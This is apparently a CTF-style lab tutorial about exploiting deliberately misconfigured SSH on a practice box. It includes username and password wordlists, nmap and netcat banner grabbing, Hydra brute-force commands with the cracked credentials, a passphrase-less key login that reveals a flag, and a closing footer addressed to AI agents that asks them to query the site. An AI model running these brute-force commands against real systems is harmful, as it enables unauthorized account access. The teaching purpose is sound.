# SSH
SSH (Secure Shell) is a network protocol that allows secure remote access to another computer or server over a network. It's widely used for system administration tasks, managing servers, and even transferring files.
When configuring SSH, there are several settings that can be misconfigured, making the server vulnerable to attacks such as brute-forcing, unauthorized login attempts, and privilege escalation. In this guide, we’ll walk through the misconfigurations in SSH we’ve set up on the `EnumLikeAPro` box to help you understand how to enumerate and exploit these issues.
usernames.txt
```
sita
ram
gita
hari
shyam
rita
nabin
sabin
sunita
bikash
anish
sanjay
bimal
rekha
kiran
sagar
binita
dipak
pratik
anita
suman
nisha
priyanka
roshan
sarita
bishal
manoj
sunil
manisha
ramesh
sushil
kushal
ujwal
alok
sweta
nirajan
bijay
krishna
rabin
rajesh
aayush
milan
anil
bina
deepa
ranjana
ruchi
arjun
meena
jyoti
pramod
```
passwords.txt
```
ram123
sita1234
nepal123
password
gita@2020
shyam@123
abcd1234
nepal2079
admin123
user@123
bikash2023
test1234
hello@123
password1
welcome123
iloveyou
sunita@123
12345678
qwerty
password123
sabin@2020
sanjay123
bishal321
manisha_123
nabin2022
sagar#123
dipak@123
1234abcd
login2023
milan2078
anil123
meena#2020
rajesh@321
suman@1
kiran_1234
ruchi@789
deepa_2077
ujwal@111
bijay#1
toor
arjun_321
ritanepal
sushil123
manoj2020
sweta@456
ramesh2076
alok@pass
sita@nepal
ram1234
hari!123
nirajan_22
roshan_123
jyoti2023
```
## SSH Banner Grabbing
One of the first things you should do when enumerating SSH is to grab its version and banner. This gives us valuable information about the SSH service running on the target. It can reveal the SSH version, which can sometimes be exploited if the version has known vulnerabilities.
❯ nmap -sV -p22 enumlikeapro.nca
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-10 11:51 +0545
Nmap scan report for enumlikeapro.nca (192.168.10.163)
Host is up (0.00021s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.20 seconds
This tells you what SSH version is running and if there are any known vulnerabilities associated with it.
### Banner Grabbing with Netcat (nc)
We can also use netcat or nc for banner grabbing:
```bash
❯ nc enumlikeapro.nca 22
SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.13
```
In real-world environments, exposing too much information like this is a security risk.
## Brute-Forcing SSH Credentials
One of the main misconfigurations is enabling **password authentication** on SSH. This means attackers can try to guess the password for various accounts using brute-force methods.
**Misconfiguration:**
* **PasswordAuthentication yes** (enabled password login)
* **Allow root login**: The root account can also log in via SSH with a password.
**Brute-Force Attack:**\
We can use a tool like **Hydra** to attempt brute-forcing various usernames and passwords:
❯ hydra -l sita -P EnumLikeAPro/passwords.txt ssh://enumlikeapro.nca
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-05-10 11:56:37
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 50 login tries (l:1/p:50), ~4 tries per task
[DATA] attacking ssh://enumlikeapro.nca:22/
[22][ssh] host: enumlikeapro.nca login: sita password: sita1234
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-05-10 11:56:41
This command uses a list of possible passwords (wordlist) and tries to brute-force login as the `sita` user. Hydra will try each password and report back once it finds a valid login.
If we don't know usernames available in the server then:
❯ hydra -L EnumLikeAPro/usernames.txt -P EnumLikeAPro/passwords.txt ssh://enumlikeapro.nca
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-05-10 12:01:49
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
-I
[DATA] max 16 tasks per 1 server, overall 16 tasks, 2601 login tries (l:51/p:51), ~163 tries per task
[DATA] attacking ssh://enumlikeapro.nca:22/
[22][ssh] host: enumlikeapro.nca login: sita password: sita1234
[22][ssh] host: enumlikeapro.nca login: gita password: password
[STATUS] 344.00 tries/min, 344 tries in 00:01h, 2259 to do in 00:07h, 14 active
[STATUS] 287.33 tries/min, 862 tries in 00:03h, 1741 to do in 00:07h, 14 active
[STATUS] 287.86 tries/min, 2015 tries in 00:07h, 588 to do in 00:03h, 14 active
[STATUS] 286.50 tries/min, 2292 tries in 00:08h, 311 to do in 00:02h, 14 active
[STATUS] 282.78 tries/min, 2545 tries in 00:09h, 58 to do in 00:01h, 14 active
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-05-10 12:11:13
This will try all combinations of usernames from `usernames.txt` and passwords from `passwords.txt`. This is a common way of testing for weak SSH login credentials.
## Weak/Default Credentials
In this setup, we’ve intentionally used weak or default passwords for some user accounts. For example:
* **User `ram`**: Password `ram1234`
* **User `gita`**: Password `password`
These are weak passwords that can be easily cracked with brute-forcing tools. If you look at the password list we created, these passwords are commonly used and are easy for attackers to guess. Hydra bruteforce attack also found these credentials easily. In CTFs, you would generally use wordlist such as `rockyou.txt` located at:
❯ locate rockyou.txt
/usr/share/wordlist/rockyou.txt
/usr/share/wordlist/SecLists/Passwords/Leaked-Databases/rockyou.txt.tar.gz
## SSH Key-Based Authentication
While passwords are a common attack vector, **SSH keys** offer a more secure way to authenticate. However, we've intentionally misconfigured SSH keys by setting up a user `dev` with an **SSH key** but no **passphrase**, making it easy to misuse.
{% hint style="warning" %}
You will find the private key somewhere in the file system, if you have been following from up, you'll find it somewhere.
{% endhint %}
**Misconfiguration:**
* SSH key for `dev` with no passphrase. This allows anyone with access to the private key to log in without any password.
To login via SSH key-based authentication, you can try using the **private key** for the `dev` user.
{% hint style="success" %}
Before using `id_rsa` using `-i` flag, the id\_rsa must have `600` permission.
{% endhint %}
❯ ssh -i ../id_rsa dev@enumlikeapro.nca
The authenticity of host 'enumlikeapro.nca (192.168.10.163)' can't be established.
ED25519 key fingerprint is SHA256:VRAQnljUgBF9UXWdEqM+ExCK8L0tfz+b0t92QtAmF0w.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:164: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'enumlikeapro.nca' (ED25519) to the list of known hosts.
/ | / / ____/ | / | / /__ ____ ____ _/ /
/ |/ / / / /| | / |/ / _ \/ __ \/ __ `/ /
/ /| / /___/ ___ | / /| / __/ /_/ / /_/ / /
/_/ |_/\____/_/ |_| /_/ |_/\___/ .___/\__,_/_/
Welcome to the EnumLikeAPro SSH Service!
-- Powered by ncateam.xyz --
▓▒░ Server : Ubuntu 22.04.5 LTS
▓▒░ SSH : OpenSSH_8.9p1
▓▒░ Contact : admin@enumlikeapro.nca
▓▒░ Warning : Authorized Access Only!
▓▒░ Logged IP : $SSH_CLIENT
╔════════════════════════════════════════════════════╗
║ Unauthorized access is prohibited and monitored. ║
╚════════════════════════════════════════════════════╝
🎯 FLAG: nca{w3lc0me_2_enumlikeapro}
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-139-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
System information as of Sat May 10 06:25:01 AM UTC 2025
System load: 0.12
Usage of /: 46.4% of 11.21GB
Memory usage: 9%
Swap usage: 0%
Processes: 151
Users logged in: 1
IPv4 address for enp0s3: 192.168.10.163
IPv6 address for enp0s3: 2400:1a00:b050:201d:a00:27ff:fe91:9f64
Expanded Security Maintenance for Applications is not enabled.
55 updates can be applied immediately.
To see these additional updates run: apt list --upgradable
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
New release '24.04.2 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Last login: Sat May 10 06:05:15 2025 from 192.168.10.76
dev@enumlikeapro:~$
## Root User Login
By default, most systems disable root login via SSH for security. However, in our setup, we’ve enabled **root login** with a password.
**Misconfiguration:**
* **PermitRootLogin yes**: Root login is allowed via SSH.
This means, we can do:
```bash
ssh root@enumlikeapro.nca
```
And we should get a root shell via ssh protocol.
{% hint style="success" %}
**Your Task**: Use the provided wordlists and find valid password for root user.
{% endhint %}
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://handbook.ncateam.xyz/reconnaissance/services-enumeration/ssh.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.